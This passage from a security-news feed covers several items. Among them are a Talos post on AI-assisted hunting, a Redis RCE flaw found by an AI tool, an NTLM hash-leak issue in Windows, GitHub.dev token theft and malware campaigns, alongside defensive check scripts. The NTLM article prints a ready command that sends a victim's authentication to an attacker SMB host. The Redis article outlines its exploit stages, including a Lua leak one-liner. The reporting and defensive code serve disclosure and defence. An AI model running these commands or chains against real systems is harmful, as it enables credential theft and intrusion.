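    """Broader sweep: every host whose process history (encoded commands
    included) references an artifact taken from a confirmed finding."""
    hosts = set()
    for ep in ep_events:
        decoded = decode_encoded_command(ep["cmdline"]) or ""
        if artifact in ep["cmdline"] or artifact in decoded:
            hosts.add(ep["device_ip"])
    return sorted(hosts)

if __name__ == "__main__":
    print(correlate(FIREWALL_EVENTS, ENDPOINT_EVENTS))
    print(sweep(ENDPOINT_EVENTS, "script.ps1"))
```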

How AI and human analysts divide the work 

Talos Threat Hunting runs on a hybrid model where each component does what it's best at. 

The AI engine handles volume and persistence. It executes hundreds of hunt hypotheses continuously across all customer environments. It applies statistical models (DGA detection, behavioral baselining, anomaly scoring) to telemetry streams at a scale no analyst team could match. Its job is to reduce the search space by taking the full volume of telemetry and surfacing the subset that warrants human attention. 

Human analysts handle context and judgment. A statistical anomaly is not the same as a confirmed threat. Analysts validate findings by correlating across data sources, applying knowledge of the customer's environment, and making determinations that require understanding adversary intent. When an analyst confirms a finding, the customer receives a written notification explaining what was observed, why it matters, how it maps to known techniques (MITRE ATT&CK or equivalent), and specific remediation guidance. 

This is not "AI finds threats and humans approve them." The AI surfaces candidates from a space too large for humans to search manually. Humans then do investigative work that AI cannot always reliably perform: understanding whether a particular behavior is malicious or benign given the full operational context of that specific environment.

The feedback loop: Hunting improves detection 

Every confirmed finding is first reported to the customer, then evaluated for a second question: “Should this have been caught by automated detection?” 

If the answer is yes, that means a detection gap exists. Maybe a rule needs tuning, a sensor configuration needs adjustment, or the customer's policy allows something that creates unnecessary exposure. In each case, the finding feeds back into product improvement or customer-specific configuration recommendations.

This creates a cycle: Intelligence drives hypotheses, hypotheses drive hunts, hunts produce findings, findings improve detection, and better detection raises the bar for what qualifies as "between the alerts." The space we hunt in gets harder to exploit over time. 

What this means for your security team 

If you have a mature SOC, this covers the ground your team is not currently reaching. These hypotheses are built from global threat intelligence, executed continuously, across telemetry your analysts may not have time to proactively search. The findings are validated before they reach you, so they add signal without adding noise. 

If you are running a lean security operation, this provides a hunting capability that would otherwise require dedicated headcount, specialized tooling, and the institutional knowledge to know what "normal" looks like well enough to spot deviations. 

Either way, the output is not more alerts. It's written findings with context, mapped to adversary techniques, with clear next steps that you can act on directly. To learn more, contact your Cisco account team and explore what’s possible with Cisco Talos.  

Some products or features described may be in various stages of development and offered on a when-and-if available basis. Cisco reserves the right to change delivery timelines and will have no liability for any delays or failures to deliver.  



from Cisco Talos Blog https://ift.tt/XhyNnip
via IFTTT

FlutterShell Backdoor Spreads to macOS via Malicious Google and YouTube Ads

Cybersecurity researchers have shed light on a macOS malvertising campaign codenamed Operation FlutterBridge that spreads a new backdoor called FlutterShell.

According to Palo Alto Networks Unit 42, the campaign is said to be the next stage of a previously reported activity cluster dubbed JSCoreRunner (aka FileRipple) in late August 2025. The cybercrime group behind the two attack chains is being tracked under the moniker CL-CRI-1089. The attackers are assessed to be active since at least 2023.

"Built using the Flutter framework, FlutterShell infects targets with adware via malicious desktop applications," Unit 42 said. "In addition to its adware functionality, the payload possesses backdoor capabilities, including shell command execution and file system manipulation."

Operations attributed to CL-CRI-1089 also include Recipe Lister and Calendaromatic, both of which fall under a broader designation known as TamperedChef (aka EvilAI), an ongoing series of campaigns that involve using trojanized versions of productivity software to deliver potentially unwanted programs (PUPs) and adware.

These campaigns distribute malicious Google and YouTube advertisements using a network of Google-verified shell companies, with the ads acting as a lure to trick targets into deploying malware that masquerades as legitimate desktop applications. Some of the front companies are AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED (now PACIFIC TRADE SOLUTIONS LTD).

Target audiences for these ads are macOS users in the U.S., Canada, Australia, France, and Germany. Although none of the Google Ads accounts are currently accessible via the Google Ads Transparency Center, records from YouControl and the U.K. government's Companies House register indicate that the firms all have links to Ukrainian individuals.

The latest iteration entails the deployment of FlutterShell, which supports arbitrary command execution, file system interaction, and environment variables exfiltration. These efforts have been detected as recently as March 2026.

"Upon execution, the malware modifies Google Chrome configuration files to hijack the browser, forcing all traffic through an attacker-controlled, ad-filled intermediary site," researchers Ido Asher, Noa Dekel, and Tom Fakterman said. "All observed samples were signed with valid Apple Developer IDs and successfully passed notarization, meaning Apple's automated security checks did not flag them as malicious at the time of submission."

What makes FlutterShell noteworthy is that it implements a WebView-based architecture that utilizes a JavaScript-to-native bridge, thereby allowing the adversary to host malicious logic on an external website, rather than embedding it into the binary. This, in turn, makes it possible to dynamically alter the malware's behavior in real time without having to recompile or push out an updated version to compromised hosts.

"In WebView-based architecture, a native application uses an embedded web browser component to display content," Unit 42 explained. "The JavaScript-to-native bridge acts as a communication channel between this web content and the host native application, allowing them to exchange data and cross-invoke functionality."

Three different variants of FlutterShell, viz., PodcastsLounge, PDF-Brain, and PDF-Ninja, have been identified. This, coupled with the presence of unfinished functions in the JavaScript logic hosted on the attackers' infrastructure, suggests the malware is likely under active development.

Some of the variants, PDF-Brain and PDF-Ninja, feature an artificial intelligence (AI)-powered summarization capability by relaying documents through an attacker-controlled server before processing them. FlutterShell also enables system fingerprinting and the theft of browser session data.

FlutterShell has also been found to share technical similarities with Calendaromatic and Recipe Lister, the most obvious being the WebView-based code architecture to facilitate dynamic payload changes. What's more, Advantage Web Marketing LLC has been observed not only spreading malicious ads but also acting as the signatory for Windows adware variants associated with the cluster.

"The evolution from JSCoreRunner to FlutterShell represents a significant increase in technical depth for the attackers behind CL-CRI-1089," Unit 42 said. "Furthermore, the scale of the distribution network, coupled with the verified shell entities used to bypass ad-network vetting, highlights the persistent danger of malvertising. The coordination of multiple shell entities, and the rapid development and delivery of new FlutterShell variants, indicates that this campaign is far from over."

from The Hacker News https://ift.tt/IMQnCNH

Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)

Redis has patched a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.

Tracked as CVE-2026-23479, the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years. NVD rates it 8.8 under CVSS 3.1; Redis lists it as 7.7 under CVSS 4.0. It was reported by Team Xint Code, and a complete technical write-up is now public.

The cloud footprint makes this worse. Wiz's analysis, published with the exploit writeup, puts Redis in a large majority of cloud environments, with most of those instances running without a password. The exploit needs an authenticated session, but in a default deployment, the default user already holds every privilege the chain requires.

The flaw lives in unblockClientOnKey() in src/blocked.c, which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient(), then keeps using the same client pointer. The problem: that function can free the client as a side effect, and its own header comment says so. The caller ignores the return value and reads the freed structure anyway, a use-after-free (CWE-416).

Per Wiz's analysis, the bug took two commits to create. A January 2023 refactor (PR #11012) added the unchecked call. A March 2023 change (PR #11568) added more client access after it. Neither was dangerous alone. Together, they reached general availability in 7.2.0 and survived multiple rounds of security review.

The chain starts by leaking a heap address. From there it frees a client and slips a fake one into the same memory, then turns Redis's own memory accounting against itself to overwrite a function pointer.

The published version runs in three stages.

  • First, a one-line Lua script (EVAL "return tostring(redis.call)" 0) leaks a heap pointer.
  • Second, the attacker grooms client memory limits, parks a bloated client on a stream, then drops the limits and wakes it. Redis frees the blocked client mid-call, and a pipelined SET immediately reclaims the freed slot with a fake client structure.
  • Third, Redis's routine memory accounting in updateClientMemoryUsage() performs an out-of-bounds decrement using attacker-controlled fields, aimed at the Global Offset Table to repoint strcasecmp() at system(). The next command Redis parses runs as a shell command.

The official Redis Docker image makes the last step easier. It ships with only partial RELRO, leaving the GOT writable at runtime. ASLR and PIE do not help here, since the write is relative to a global whose offset is fixed at build time.

The full chain needs an authenticated session with CONFIG SET, EVAL, stream commands (XREAD/XADD), and basic SET/GET, which maps to the @admin, @scripting, @stream, and @read/@write ACL categories.

The default user has all of them, and in most deployments, these privileges are grouped into a single shared application or operator role. Denying CONFIG outright breaks this specific chain, though not the underlying use-after-free.

Team Xint Code demonstrated the working RCE at ZeroDay.Cloud 2025, Wiz's hacking competition in London last December. Theori describes Xint Code as an autonomous AI security tool built to hunt bugs in large codebases.

Redis said it had no evidence of exploitation in its own or customer environments, and as of publication no public in-the-wild reports have surfaced. The full technical chain is now public, increasing the risk of follow-on exploitation.

Upgrade to the patched minor for your series: 7.2.14, 7.4.9, 8.2.6, 8.4.3, or 8.6.3, all released on May 5. Minor upgrades within a series are meant to be drop-in. Managed Redis services patch on their own schedules, and Redis says Redis Cloud is already done.

Branch   Affected           Fixed
7.2.x    7.2.0 to 7.2.13    7.2.14
7.4.x    7.4.0 to 7.4.8     7.4.9
8.2.x    8.2.0 to 8.2.5     8.2.6
8.4.x    8.4.0 to 8.4.2     8.4.3
8.6.x    8.6.0 to 8.6.2     8.6.3

If you cannot patch yet: keep Redis off the public internet and behind TLS, tighten ACLs so no single role holds @admin, CONFIG, and @scripting together, and deny @scripting if you do not use Lua, which kills the Stage 1 leak.

Prioritize internet-exposed instances, shared application credentials, and any role that combines CONFIG, scripting, and stream access. Rotate any broadly shared Redis credentials while you are at it.
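
An added example, not Redis or Wiz code, of the two checks the advisory implies: comparing a server's INFO version against the fixed release for its branch, and replaying ACL LIST rules to find enabled users that are passwordless or hold CONFIG, @scripting and @stream in one role. The ACL replay treats CONFIG as granted through @admin or an explicit +config, a simplification of Redis's full category model; the sample inputs are constructed.

```python
import re

# Fixed release per branch, from the advisory (major.minor -> first fixed version).
FIXED = {
    (7, 2): (7, 2, 14), (7, 4): (7, 4, 9), (8, 2): (8, 2, 6),
    (8, 4): (8, 4, 3), (8, 6): (8, 6, 3),
}
FIRST_AFFECTED = (7, 2, 0)

def parse_version(info_text):
    """Pull redis_version out of INFO output (e.g. 'redis_version:7.2.10')."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)\.(\d+)", info_text, re.M)
    if not m:
        raise ValueError("redis_version not found in INFO output")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(version):
    if version < FIRST_AFFECTED:
        return False
    fixed = FIXED.get(version[:2])
    if fixed is None:
        return True  # branch missing from the table: treat as unpatched until confirmed
    return version < fixed

def effective_rules(tokens):
    """Replay ACL rules left to right (later rules win, as Redis applies them).
    Returns (allow_all, allowed_categories, denied_categories, config_allowed).
    Simplification: CONFIG is tracked via @admin plus explicit +config/-config."""
    allow_all, allowed, denied, config_ok = False, set(), set(), False
    for tok in tokens:
        if tok in ("+@all", "allcommands"):
            allow_all, allowed, denied, config_ok = True, set(), set(), True
        elif tok in ("-@all", "nocommands"):
            allow_all, allowed, denied, config_ok = False, set(), set(), False
        elif tok.startswith("+@"):
            allowed.add(tok[1:])
            denied.discard(tok[1:])
            if tok == "+@admin":
                config_ok = True
        elif tok.startswith("-@"):
            denied.add(tok[1:])
            allowed.discard(tok[1:])
            if tok == "-@admin":
                config_ok = False
        elif tok in ("+config", "-config"):
            config_ok = tok == "+config"
    return allow_all, allowed, denied, config_ok

def granted(category, rules):
    allow_all, allowed, denied, _ = rules
    return category not in denied and (allow_all or category in allowed)

def assess_acl(acl_list_output):
    """Map user name -> findings for each 'user ...' line of ACL LIST output."""
    findings = {}
    for line in acl_list_output.strip().splitlines():
        tokens = line.split()
        if len(tokens) < 2 or tokens[0] != "user":
            continue
        name, rest = tokens[1], tokens[2:]
        if "off" in rest:
            continue  # disabled users cannot authenticate at all
        rules = effective_rules(rest)
        issues = []
        if "nopass" in rest:
            issues.append("no password")
        scripting = granted("@scripting", rules)
        if rules[3] and scripting and granted("@stream", rules):
            issues.append("CONFIG, @scripting and @stream in one role")
        elif scripting:
            issues.append("@scripting granted (deny it if Lua is unused)")
        findings[name] = issues
    return findings

# Constructed sample inputs (not taken from any real deployment).
SAMPLE_INFO = "# Server\nredis_version:7.2.10\nredis_mode:standalone\n"
SAMPLE_ACL = """\
user default on nopass sanitize-payload ~* &* +@all
user app on #1a2b3c sanitize-payload ~app:* &* -@all +@read +@write +@stream
user ops on #4d5e6f sanitize-payload ~* &* +@all -@scripting
user legacy off nopass sanitize-payload ~* &* +@all
"""

if __name__ == "__main__":
    v = parse_version(SAMPLE_INFO)
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
    for user, issues in assess_acl(SAMPLE_ACL).items():
        print(user, issues or ["ok"])
```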

CVE-2026-23479 was one of five RCE-class Redis flaws disclosed last month, and it follows Redis's 2025 RediShell flaw, another authenticated use-after-free involving Lua scripting. It is also the one an AI tool caught. Two commits planted it, two years hid it, and it sat in one of the most-deployed databases around until a hacking contest surfaced it. Code review never did.

from The Hacker News https://ift.tt/Vu8MnJj

Hackers Spied on a Stock Exchange Executive's Outlook Mailbox for Five Months

Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity.

Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. This points to espionage, not a money grab: Symantec said the commands indicate intelligence collection, not theft for profit.

Neither the executive nor the exchange was named. The value is plain enough: an exchange executive's inbox can hold non-public listing details, enforcement matters, deal terms, market-moving plans, plus the executive's calendar and contacts.

Five months of quiet access handed the attacker a detailed read on the executive's dealings and where the organization was heading, without needing broad access to other business systems.

The first malicious activity showed up on October 10, 2025. By then, the attacker was already running two binaries as SYSTEM, the highest Windows privilege level, one faking Adobe's updater and the other faking OneDrive. By the time defenders noticed anything, the intruder had full control of the machine, and how they first got in is still unknown.

However, Symantec confirmed that the first signs likely came from lateral movement off a previously compromised device. The operation kicked into gear on November 12. The attacker pulled a Dropbox API token, started uploading data with curl, and deployed the main tool: a mailbox stealer built on Aspose, a legitimate .NET library that reads Outlook OST and PST files. Wrapped in an executable, it converted the mailbox to PST and wrote it to disk, run each time with a password and a date-range flag.

The first run grabbed everything from August 2025 on. After that the attacker came back every two to four weeks, each run taking only the days since the last one, eight more pulls through February 17, 2026. The result is a near-continuous copy of the mailbox, sliced thin enough not to draw attention from security software.

The stealth came from making the work look ordinary. Scheduled tasks posed as Adobe, Lenovo and OneDrive system services. For exfiltration the attacker used Dropbox and OneDrive Personal, and for OneDrive they connected to hard-coded Microsoft IP addresses instead of the onedrive.live.com hostname, so there were no DNS lookups for a perimeter tool to catch or block.

The attacker also tested the public file host temp.sh once in November, then dropped it. The last observed activity, on March 19, 2026, was a new backdoor that was staged but never run, which Elias said may mean the attacker lost access soon after.

Symantec's published indicators point to a wider intrusion kit, not just a mailbox grabber: FRPC for tunneling traffic out, Secretsdump for pulling Windows credentials, SharpDecryptPwd for recovering saved app passwords, and a tool to bypass Windows User Account Control. The report does not say how each was used here, and none of them point to a specific group.

There is no CVE in this story. It was an intrusion against a person's mailbox, not the exploitation of a freshly disclosed flaw, which is part of why it is worth reading: no patch closes this, and the burden shifts to monitoring and response.

Attribution is unresolved too. The mix of public tooling and consumer cloud services left little to tie the activity to a known actor, and that stays open until a stronger source says otherwise. Routing exfiltration through Dropbox and OneDrive to blend in is a well-worn play, and one Microsoft has flagged as a deliberate way to slip past perimeter defenses and muddy attribution.

If you defend an exchange, a regulator, or any firm sitting on market-moving information, feed the hashes in now and watch for the behavior behind them: unusual mailbox export activity, odd Outlook access, uploads to personal Dropbox or OneDrive accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.

from The Hacker News https://ift.tt/1ZXAMoR

DoJ Disrupts Southeast Asia Crypto Fraud Networks, Freezes $3.8 Million in Assets

The U.S. Department of Justice (DoJ) on Wednesday announced the results of a sweeping action undertaken by government authorities and private sector companies to combat cyber-enabled and cryptocurrency fraud targeting Americans.

The "Disruption Week" operation began May 18, 2026, leading to the takedown of millions of social media, email, and internet access accounts used by transnational cybercrime groups in Southeast Asia to defraud victims. Private sector entities voluntarily froze over $3.8 million in cryptocurrency involved in the laundering of funds stolen from Americans.

"Cyber-enabled and crypto investment fraud is devastating Main Street Americans, wiping out life savings and preying on some of our most vulnerable citizens," said U.S. Attorney Jeanine Ferris Pirro for the District of Columbia.

The efforts are part of an ongoing U.S. government initiative called Scam Center Strike Force, which aims to dismantle transnational criminal organizations running cyber-enabled fraud and "pig butchering" (aka romance baiting) scams from compounds in Southeast Asia, along with the human trafficking and money laundering operations that fuel the illicit enterprise.

These schemes typically involve cultivating relationships with prospective victims over time before they are coaxed into depositing funds into fraudulent investment platforms under the promise of high returns. Once the assets are deposited, they are routed to accounts under the scammers' control. Once the victim runs out of money or discovers the fraud, the criminals cease contact with them.

Participating in the operation were Apple, Coinbase, Google, Meta, Microsoft, Silent Push, SpaceX/Starlink, TRM Labs, and Zenlayer, alongside the Australian Federal Police, Canadian Anti-Fraud Centre, New Zealand Police, the Royal Thai Police, and U.K. National Crime Agency.

The "first-of-its-kind event" has resulted in a series of actions -

  • Disruptions of criminal activity across more than 1.4 million accounts, pages and groups across Facebook and Instagram, 20,000 Microsoft accounts, and thousands of Starlink kits;
  • Interruptions of malicious IP address traffic and of network connections hosted by scammers;
  • Decommissioning of servers, colocation environments, and hosting infrastructure linked to scam networks operating across Southeast Asia;
  • Identification of multiple scammers and scam platforms, and referrals of the same to U.S. authorities for investigation and possible prosecution; and
  • Arrests of seven scammers in Thailand and the opening of new cases by the Royal Thai Police Anti-Cyber Scam Center.

According to the DoJ, cryptocurrency investment scams have emerged as one of the "fastest growing and most financially devastating forms of fraud" targeting Americans, with reported losses from these scams rising from $3.96 billion in 2023 to $5.8 billion in 2024 and to more than $7.2 billion in 2025, registering a 24% increase year-over-year.

"Many of these schemes are run out of industrial-scale compounds in Cambodia, Laos, and in Burma along the border with Thailand," the DoJ said. "Criminal syndicates often lure workers to Thailand with promises of high-paying technical jobs, then seize their identification documents and traffic them to work in scam compounds."

"Within the compounds, trafficked workers are frequently forced to conduct fraud operations against victims in the United States and elsewhere under threat of violence."

Last month, a joint international operation involving U.S. and Chinese authorities arrested at least 276 suspects and shut down nine scam centers used for cryptocurrency investment fraud schemes targeting Americans.

In a coordinated statement, Meta said law enforcement has arrested 63 potential criminals connected to scam centers thus far, with Coinbase freezing over $3 million in cryptocurrency assets tied to criminal networks.

"Transnational online fraud cannot be solved by any single agency or country acting alone, which is why strong collaboration and timely information sharing remain essential to dismantling these networks and protecting the public," Police Lieutenant General Jirabhop Bhuridej, Royal Thai Police, said.

from The Hacker News https://ift.tt/32uGIHx

Wednesday, June 3, 2026

Google DoubleClick Abused in New Malspam Campaign to Deliver DesckVB RAT

Cybersecurity researchers have flagged a new malspam campaign that makes use of Google's DoubleClick domain as a way to evade detection and ultimately deliver a remote access trojan (RAT) named DesckVB RAT.

"Before the victim ever reaches attacker-controlled infrastructure, the lure routes through DoubleClick, a legitimate Google-owned domain that many security tools are less likely to treat as suspicious," Huntress researchers Anna Pham and Adam Mooney said in a report shared with The Hacker News.

"From there, the victim is passed into a malspam kit that personalizes itself on the fly using the victim's email address, dynamically pulling in company branding and location details to make the page feel convincing without requiring the operators to handcraft a lure for each target."

What makes this attack noteworthy is that it eliminates the need for having a bespoke kit for each targeted organization, thereby making these operations more scalable and cost-effective. The end goal of the campaign is to drop DesckVB RAT, a .NET-based trojan that has been active in the wild since February 2026.

The attack begins when an unsuspecting user opens an HTML file that's attached to a phishing email. The file triggers a meta-refresh browser redirect to a Google DoubleClick Campaign Manager click-tracking URL, from where the user is steered to another redirector, which decodes the Base64-encoded email address and leads the victim to a landing page containing a "Download PDF" button.

Clicking the button causes the server to respond with a ZIP archive that initiates the rest of the infection chain. This is achieved by means of a JavaScript loader, whose main responsibility is to retrieve and execute a .NET RAT while flying under the radar. The script extracts and runs a PowerShell script, which then fetches a .NET loader from an external server.
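
As an added example (not from Huntress), a check for the first two links of the chain: it extracts meta-refresh targets from an HTML attachment, notes whether the target bounces through doubleclick.net, and recovers any Base64-encoded recipient address carried in the URL for the personalisation step. The sample attachment, campaign ids and redirector domain are constructed.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

class MetaRefreshParser(HTMLParser):
    """Collect the targets of <meta http-equiv="refresh" content="N;url=...">."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9_\-+]{16,}={0,2}")

def decode_b64_email(token):
    """Return the e-mail address a Base64 token encodes, or None."""
    raw = token.rstrip("=")
    try:
        decoded = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if EMAIL_RE.match(decoded) else None

def embedded_emails(url):
    """Base64-encoded addresses anywhere in the URL (path or nested redirect)."""
    emails = []
    for m in B64_TOKEN_RE.finditer(url):
        email = decode_b64_email(m.group(0))
        if email and email not in emails:
            emails.append(email)
    return emails

AD_TRACKER_DOMAINS = ("doubleclick.net",)

def inspect_attachment(html):
    """One finding per meta-refresh target: whether it bounces through an ad
    click tracker, and any victim address carried along in Base64."""
    parser = MetaRefreshParser()
    parser.feed(html)
    findings = []
    for target in parser.targets:
        host = (urlsplit(target).hostname or "").lower()
        via_tracker = any(host == d or host.endswith("." + d) for d in AD_TRACKER_DOMAINS)
        findings.append({
            "target": target,
            "ad_tracker_redirect": via_tracker,
            "personalised_for": embedded_emails(target),
        })
    return findings

# Constructed sample attachment (placeholder campaign ids, documentation domain).
VICTIM_B64 = base64.urlsafe_b64encode(b"jane.doe@example.com").decode().rstrip("=")
SAMPLE_HTML = (
    '<html><head><meta http-equiv="refresh" content="0;url=https://ad.doubleclick.net/'
    'ddm/trackclk/N9999/B0?https://redir.example/go?u=' + VICTIM_B64 + '">'
    '</head><body>Loading document...</body></html>'
)

if __name__ == "__main__":
    for finding in inspect_attachment(SAMPLE_HTML):
        print(finding)
```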

The loader acts as a stager that verifies it's not being analyzed, neutralizes the machine's security controls, sets up persistence, and then ultimately downloads and runs the RAT payload by using a technique called process hollowing that involves injecting the malware into Microsoft-signed processes.

Once launched, the trojan communicates with a command-and-control (C2) server over raw TCP sockets, carries out system reconnaissance, and configures Microsoft Defender exclusions. The trojan also patches Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) at the native API level at the outset in an effort to blind Windows telemetry before persistence is established on the host by setting up Run and RunOnce Registry entries, along with placing a loader responsible for launching the RAT in the user's Startup folder.

The malware comes with capabilities to extract data, run commands, and deploy additional payloads, granting the attackers full control over the infected machines, while simultaneously taking steps to fly under the radar by terminating and rebooting the machine if it detects an analysis tool or determines that it's running in a sandboxed environment.

"This is a strong reminder of why defence in depth matters," Huntress said. "Configuring a Group Policy Object (GPO) in Active Directory to force script files such as .vbs, .hta, and .js to open in Notepad by default can stop a threat actor at the very first stage, preventing additional payloads from ever being dropped."

"On the email security front, organizations should consider deploying DMARC, DKIM, and SPF records to reduce the likelihood of spoofed or malicious emails reaching end users. Beyond that, an email gateway solution capable of sandboxing attachments and links before delivery adds another meaningful layer of protection."

from The Hacker News https://ift.tt/278XJcY

One-Click GitHub Dev Attack Lets Attackers Steal Full GitHub OAuth Tokens

Cybersecurity researchers have disclosed a one-click attack via Microsoft Visual Studio Code (VS Code) that makes it possible to steal a user's GitHub token.

"Just by clicking a link, it's possible for an attacker to steal a GitHub token that can read and write to your repos, including private ones," security researcher Ammar Askar said.

GitHub supports a feature called GitHub.dev that runs as a lightweight web-based source code editor in the web browser's sandbox by launching a VS Code environment. It allows users to send pull requests and make commits.

"This functionality is achieved by github.com POSTing over an OAuth token to github.dev that allows it to interact with GitHub on your behalf," Askar said. "The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to."

In a nutshell, the vulnerability allows attackers to install malicious VS Code extensions that steal GitHub OAuth tokens when they are passed to GitHub.dev by exploiting a message-passing mechanism between the main VS Code window and webviews. Webviews are used to render Markdown previews or edit Jupyter notebooks.

Specifically, the exploit runs malicious JavaScript inside an untrusted webview to simulate keypresses (aka keydown events) in the main editor window, open the Command Palette by triggering "Ctrl+Shift+P," and install an attacker-controlled extension that extracts the GitHub OAuth token sent to GitHub.dev and queries the GitHub API to enumerate all private repositories the victim can access.

It's worth noting the approach also leverages a VS Code feature called local workspace extensions that allows an extension to be directly installed without presenting any additional trust dialog prompt as long as it's placed in the ".vscode/extensions" folder within that workspace, effectively bypassing the publisher trust check.

"This is just a small hiccup though, one of the things that extensions can do as part of their package.json is to contribute extra keybindings to VS Code," the researcher explained. "Since we can reliably trigger keybindings, we can just add a keybind for whatever VS Code command we want, such as installing an extension while skipping the trusted publisher check."

The researcher also noted GitHub was notified of the vulnerability on June 2, 2026, an hour after which details of the issue were made public knowledge, citing Microsoft's handling of VS Code-related bugs in the past. As of writing, Microsoft has acknowledged the vulnerability and noted that it's working on a fix.

"To clarify, this issue does not affect VS Code Desktop," Alexandru Dima, a partner software engineering manager at Microsoft, said.

from The Hacker News https://ift.tt/jL6rAFp

Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore

Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit and now CEO of runZero, spends the session showing you that shape from the attacker's side.

Save your seat for a LIVE session, or register, and we will send you the recording.

The segmentation you think you have

The comfortable assumption: critical systems sit behind a firewall or off on their own segment, so a foothold over here cannot become a disaster over there. Call it the segmentation illusion. It holds until someone maps the network for real.

Then the seams show up. A device wired into two networks at once, quietly bridging the zones you meant to keep apart. Connected gear nobody registered, answering on a segment it should not be on. Whole sets of machines hiding behind an industrial protocol gateway, invisible to your scanner, reachable by anyone who knows the gateway is there. None of it is on the asset list. All of it routes around the control you were counting on.

Inventory is a list. Attackers read a map.

You keep an inventory, a static list of things you own. An attacker does not care about your list. They care about paths: how one foothold reaches the next, until it lands on something that hurts. The two views rarely match, and the difference is exactly the part of your network you cannot see and they can. Moore built Metasploit, the framework half the industry learned offense on, and now runs the company whose whole job is finding the assets and connections organizations don't know they have.

Grab your spot and see that view turned on your own environment.

What you leave able to do

  • Find the assets you don't know you have. Unsanctioned IT, shadow IoT, and the sub-assets behind OT protocol gateways where your scans never look.
  • Find the bridges that break segmentation. The multi-homed devices and forgotten assets connecting zones you believed were isolated.
  • See the paths, not just the parts. Trade static inventory for live attack-path mapping that shows how a foothold actually travels.
  • Fix the few things that matter. Focus remediation on the assets and links that shorten an attacker's route to impact.

Corporate network, factory floor, or both tangled together: if IT, IoT, and OT share your environment, the seams between them are where this goes wrong. See your network the way an attacker already does, before they do.

Register now. Can't make it live? Sign up anyway, and we will send the recording.

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/MsQ5lhu
via IFTTT

Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to the attacker.

Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.

CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.

"An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message," Microsoft noted in its advisory at the time.

"If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker's choosing, which would disclose the user's NTLMv2 hash to the attacker, who could use this to authenticate as the user."

Specifically, the problem had to do with the fact that the Snipping Tool's URI handler accepted a "filePath" parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim's Net-NTLMv2 hash to the attacker.

The newly discovered shortcoming achieves the same end goal using "search:" and "crumb=location:" instead of "filePath", via a command like the one below -

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating," Huntress researcher Andrew Schwartz said. It's worth noting that the use of a "crumb" parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.

As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating "only Important and Critical severity cases meet our bar for servicing."

In the absence of a fix, it's advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don't need it, enforce SMB signing so that captured hashes can't be relayed against internal services, and disable NTLM where applicable.
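One way to apply those three mitigations on a single Windows host, as an added example that is not from the Huntress report or from Microsoft. It assumes an elevated PowerShell session and that the host only needs SMB to its own subnet; the firewall scope and the NTLM restriction level are choices you should adjust for your environment.

```powershell
# Added example: apply the three mitigations described above on one host.
# Assumptions: run elevated; the host does not need SMB shares outside its
# local subnet (adjust -RemoteAddress before rolling out more widely).

# 1. Block outbound SMB (TCP/445 and TCP/139) to non-local addresses.
#    A search: URI that points at an external UNC path then fails before
#    any NTLM exchange can begin. LocalSubnet stays open so same-segment
#    file servers keep working (assumption about your environment).
New-NetFirewallRule -DisplayName "Block outbound SMB to Internet (NTLM leak mitigation)" `
    -Direction Outbound -Protocol TCP -RemotePort 445,139 `
    -RemoteAddress Internet -Action Block -Profile Any

# 2. Require SMB signing on both the client and server side so that a
#    captured Net-NTLMv2 hash cannot be relayed to internal SMB services.
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 3. Restrict outgoing NTLM to remote servers ("Network security: Restrict
#    NTLM: Outgoing NTLM traffic to remote servers"). 1 = audit only,
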